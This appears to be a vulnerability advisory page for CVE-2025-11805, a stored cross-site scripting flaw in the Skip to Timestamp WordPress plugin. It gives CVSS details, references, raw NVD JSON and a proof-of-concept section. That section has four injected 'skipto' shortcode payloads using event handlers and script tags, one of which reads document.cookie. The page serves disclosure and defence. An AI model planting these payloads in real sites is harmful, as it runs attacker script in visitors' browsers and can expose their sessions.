CVE-2025-11805

Description

The Skip to Timestamp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'skipto' shortcode in all versions up to, and including, 1.4.4. This is due to insufficient input sanitization and output escaping on the 'time' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Skip to Timestamp plugin for WordPress <= 1.4.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS PoC for CVE-2025-11805 -->
<!-- WordPress Skip to Timestamp Plugin <= 1.4.4 -->

<!-- Method 1: Using event handler -->
[skipto time="10 onerror=alert(document.domain)"]

<!-- Method 2: Breaking out of attribute with quote injection -->
[skipto time="10;alert('XSS');//"]

<!-- Method 3: Using img tag with onerror -->
[skipto time="10"><img src=x onerror=alert(document.cookie)>//"]

<!-- Method 4: Using script tag injection -->
[skipto time="10"></span><script>alert('Stored XSS');</script><span>"]

<!-- Attacker injects one of the above shortcodes in a WordPress post -->
<!-- Any user viewing the post will execute the malicious JavaScript -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11805
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11805
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11805/
[4] VulDB https://vuldb.com/cve/CVE-2025-11805
[5] https://plugins.trac.wordpress.org/browser/skip-to-timestamp/tags/1.4.4/skiptotimestamp.php#L74
[6] https://wordpress.org/plugins/skip-to-timestamp/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/48e62d66-d058-419c-93cf-0cb890177751?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11805", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:42.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Skip to Timestamp plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'skipto' shortcode in all versions up to, and including, 1.4.4. This is due to insufficient input sanitization and output escaping on the 'time' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/skip-to-timestamp/tags/1.4.4/skiptotimestamp.php#L74", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/skip-to-timestamp/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/48e62d66-d058-419c-93cf-0cb890177751?source=cve", "source": "[email protected]"}]}}